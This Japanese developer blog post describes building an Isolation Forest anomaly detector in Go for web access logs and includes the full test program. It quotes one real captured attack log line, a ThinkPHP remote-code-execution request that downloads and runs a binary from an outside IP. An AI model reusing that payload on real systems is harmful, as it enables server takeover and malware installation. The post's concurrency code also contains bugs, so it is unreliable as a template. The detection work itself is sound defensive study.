見出し画像

TWLogAIAN:異常ログを機械学習で検知する処理を貧弱なPCでも使えるように改善中

今朝は5時から開発開始です。昨日からの続きで

をGO言語で試しています。データの読み込みと特徴量の計算を作った後、

を使って異常スコアを計算する処理を組み込んでみました。昨日作った読み込み処理が高速だったので期待してテストしてみましたが、残念ながら固まってしいました。どうやらメモリ不足のようです。メモリを沢山搭載しているPCで試すとそれなりに動作します。32GBもメモリ使っています。8GBのMac miniでは固まるはずです。TWSNMPシリーズは貧弱のPCでも使えるツールにしたいというモットーがありますが、昨日はモチベーションが下がって諦めモードになりました。午後は開発をやめて、久ぶりに、かみさんと映画館に行きました。

を観て開発するモチベーションを回復しました。
今朝は、メモリ使用量削減と速度アップのためのアイデアを試してみました。試したのは、

  • ログデータの文字列のコピー回数を減らす

  • Isolation forestの学習データを減らす

  • スコアの計算も並列処理にする

の2つです。一つ目は、関数へのログを渡す時にポインターを使う方法です。

func toVector(s string) []float64 {
|
}

func toVector(s *string) []float64 {
|
}

にしました。
Isolation forestの学習データは、元のサイトの方法では、同じIPからのログを80件までに制限する方法でしたたが、シンプルに1/8だけ処理するようにしてみました。

		for scanner.Scan() {
			l := scanner.Text()
			total++
			if total%1000000 == 0 {
				log.Printf("input mid total=%d valid=%d ip=%d dur=%s", total, valid, ips, time.Since(st))
			}
			if total%8 != 0 {
                                                    //8件に1つだけ
				continue
			}
			if valid > 1000000 {
				break
			}
			wg.Add(1)
			go func(l *string) {
				defer wg.Done()
				getVector(l)
			}(&l)
		}

のような感じです。
Isolation forestの学習は並列化できませんが、異常スコアの計算は並列で実施できそうです。

		for scanner.Scan() {
			l := scanner.Text()
			test++
			if test%1000000 == 0 {
				log.Printf("test count=%d dur=%s", test, time.Since(st))
			}
			wg.Add(1)
			go func(pl *string) {
				defer wg.Done()
				v := toVector(pl)
				if len(v) > 1 {
					score := iforest.CalculateAnomalyScore(v)
					mu.Lock()
					if score < min {
						fmt.Printf("%f %s\n", score, l)
						min = score
					}
					if score > max {
						fmt.Printf("%f %s\n", score, l)
						max = score
					}
					mu.Unlock()
				}
			}(&l)
		}

のような感じです。
いろいろ改善して何となく動作するようになりました。メモリ使用量は1.5GB程度、学習データの作成は7秒、Isolation forestの学習は3分弱です。
元のサイトでは、スコアが小さいほうが異常という判定のようですが、今回使ったGO言語のIsolation forestは、異常スコアの計算なので高いほうが異常という判断のようです。
一番怪しいログは、

0.698789 185.222.202.118 - - [22/Jan/2019:09:15:46 +0330] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://185.222.202.118/bins/rift.x86;cat%20rift.x86%20%3E%20efjins;chmod%20777%20efjins;./efjins%20thinkphp HTTP/1.1" 301 178 "-" "python-requests/2.4.3 CPython/2.7.9 Linux/3.16.0-4-amd64" "-"

です。元のサイトで半分人間が判断した60番目のログです。
勝ちました。私のAIは1番怪しいログと言っています。
たぶん、この方法を使えそうです。モチベーションがマックスです。

スコアの計算までできましたが、まだTWLogAIANに組み込むことができません。計算したスコアと元のログの関係を保存してスコアの高いものだけ表示したいのですが、メモリ上で並べ替えするには量が多すぎます。何かディスクに保存する仕組みが必要です。全文検索エンジンのBlugeに登録する方法もありますが、ログの量が多いと速度が遅くなる問題があります。設定の保存に使っているbboltを使う方法か別の保存方法を考える必要がありそうです。
Isolation forest以外の異常検知も試してみたいところです。
今朝は、ここまです。午後から続きを考えるかもしれません。

明日に続く

今朝作ったテストプログラムの全体を載せておきます。

package main

import (
	"archive/zip"
	"bufio"
	"fmt"
	"log"
	"math/rand"
	"strings"
	"sync"
	"time"

	go_iforest "github.com/codegaudi/go-iforest"
)

var total = 0
var valid = 0
var ips = 0
var inputData = [][]float64{}

var mu = &sync.Mutex{}

func main() {
	log.Println("start")
	doMakeVector()
	doIForest()
	log.Println("end")
}

func doMakeVector() {
	log.Println("input start")
	st := time.Now()
	r, err := zip.OpenReader("access.log.zip")
	if err != nil {
		log.Fatal(err)
	}
	defer r.Close()
	var wg sync.WaitGroup

	for _, f := range r.File {
		log.Printf("log file=%s", f.Name)
		file, err := f.Open()
		if err != nil {
			log.Fatal(err)
		}
		defer file.Close()

		scanner := bufio.NewScanner(file)

		const maxCapacity = 10_000 * 1024 // 10MB
		buf := make([]byte, maxCapacity)
		scanner.Buffer(buf, maxCapacity)
		for scanner.Scan() {
			l := scanner.Text()
			total++
			if total%1000000 == 0 {
				log.Printf("input mid total=%d valid=%d ip=%d dur=%s", total, valid, ips, time.Since(st))
			}
			if total%8 != 0 {
				continue
			}
			if valid > 1000000 {
				break
			}
			wg.Add(1)
			go func(l *string) {
				defer wg.Done()
				getVector(l)
			}(&l)
		}

		if err := scanner.Err(); err != nil {
			log.Fatal(err)
		}
	}
	wg.Wait()
	log.Printf("input end total=%d valid=%d ip=%d dur=%s", total, valid, ips, time.Since(st))
}

func doIForest() {
	log.Println("iforest start")
	st := time.Now()
	rand.Seed(time.Now().UnixNano())
	iforest, err := go_iforest.NewIForest(inputData, 1000, 256)
	if err != nil {
		log.Fatal(err)
	}
	log.Printf("iforest end dur=%s", time.Since(st))
	st = time.Now()
	r, err := zip.OpenReader("access.log.zip")
	if err != nil {
		log.Fatal(err)
	}
	defer r.Close()
	min := 1.0
	max := 0.0
	test := 0
	var wg sync.WaitGroup
	for _, f := range r.File {
		log.Printf("log file=%s", f.Name)
		file, err := f.Open()
		if err != nil {
			log.Fatal(err)
		}
		defer file.Close()
		scanner := bufio.NewScanner(file)
		const maxCapacity = 10_000 * 1024 // 10MB
		buf := make([]byte, maxCapacity)
		scanner.Buffer(buf, maxCapacity)
		for scanner.Scan() {
			l := scanner.Text()
			test++
			if test%1000000 == 0 {
				log.Printf("test count=%d dur=%s", test, time.Since(st))
			}
			wg.Add(1)
			go func(pl *string) {
				defer wg.Done()
				v := toVector(pl)
				if len(v) > 1 {
					score := iforest.CalculateAnomalyScore(v)
					mu.Lock()
					if score < min {
						fmt.Printf("%f %s\n", score, l)
						min = score
					}
					if score > max {
						fmt.Printf("%f %s\n", score, l)
						max = score
					}
					mu.Unlock()
				}
			}(&l)
		}
	}
	wg.Done()
}

func getVector(s *string) {
	v := toVector(s)
	if len(v) > 1 {
		valid++
		mu.Lock()
		inputData = append(inputData, v)
		mu.Unlock()
	}
}

func toVector(s *string) []float64 {
	vector := []float64{}
	a := strings.Split(*s, "\"")
	if len(a) < 2 {
		return vector
	}
	f := strings.Fields(a[1])
	if len(f) < 3 {
		return vector
	}
	query := ""
	ua := strings.SplitN(f[1], "?", 2)
	path := ua[0]
	if len(ua) > 1 {
		query = ua[1]
	}
	ca := getCharCount(a[1])

	//findex_%
	vector = append(vector, float64(strings.Index(a[1], "%")))

	//findex_:
	vector = append(vector, float64(strings.Index(a[1], ":")))

	// countedCharArray
	for _, c := range []rune{':', '(', ';', '%', '/', '\'', '<', '?', '.', '#'} {
		vector = append(vector, float64(ca[c]))
	}

	//encoded =
	vector = append(vector, float64(strings.Count(a[1], "%3D")+strings.Count(a[1], "%3d")))

	//encoded /
	vector = append(vector, float64(strings.Count(a[1], "%2F")+strings.Count(a[1], "%2f")))

	//encoded \
	vector = append(vector, float64(strings.Count(a[1], "%5C")+strings.Count(a[1], "%5c")))

	//encoded %
	vector = append(vector, float64(strings.Count(a[1], "%25")))

	//%20
	vector = append(vector, float64(strings.Count(a[1], "%20")))

	//POST
	if strings.HasPrefix(a[1], "POST") {
		vector = append(vector, 1)
	} else {
		vector = append(vector, 0)
	}

	//path_nonalnum_count
	vector = append(vector, float64(len(path)-getAlphaNumCount(path)))

	//pvalue_nonalnum_avg
	vector = append(vector, float64(len(query)-getAlphaNumCount(query)))

	//non_alnum_len(max_len)
	vector = append(vector, float64(getMaxNonAlnumLength(a[1])))

	//non_alnum_count
	vector = append(vector, float64(getNonAlnumCount(a[1])))

	for _, p := range []string{"/%", "//", "/.", "..", "=/", "./", "/?"} {
		vector = append(vector, float64(strings.Count(a[1], p)))
	}
	return vector
}

func getCharCount(s string) []int {
	ret := []int{}
	for i := 0; i < 96; i++ {
		ret = append(ret, 0)
	}
	for _, c := range s {
		if 33 <= c && c <= 95 {
			ret[c] += 1
		}
	}
	return ret
}

func getAlphaNumCount(s string) int {
	ret := 0
	for _, c := range s {
		if 65 <= c && c <= 90 {
			ret++
		} else if 97 <= c && c <= 122 {
			ret++
		} else if 48 <= c && c <= 57 {
			ret++
		}
	}
	return ret
}

func getMaxNonAlnumLength(s string) int {
	max := 0
	length := 0
	for _, c := range s {
		if ('a' <= c && c <= 'z') || ('A' <= c && c <= 'Z') || ('0' <= c && c <= '9') {
			if length > max {
				max = length
			}
			length = 0
		} else {
			length++
		}
	}
	if max < length {
		max = length
	}
	return max
}

func getNonAlnumCount(s string) int {
	ret := 0
	for _, c := range s {
		if ('a' <= c && c <= 'z') || ('A' <= c && c <= 'Z') || ('0' <= c && c <= '9') {
		} else {
			ret++
		}
	}
	return ret
}

開発のための諸経費(機材、Appleの開発者、サーバー運用)に利用します。 ソフトウェアのマニュアルをnoteの記事で提供しています。 サポートによりnoteの運営にも貢献できるのでよろしくお願います。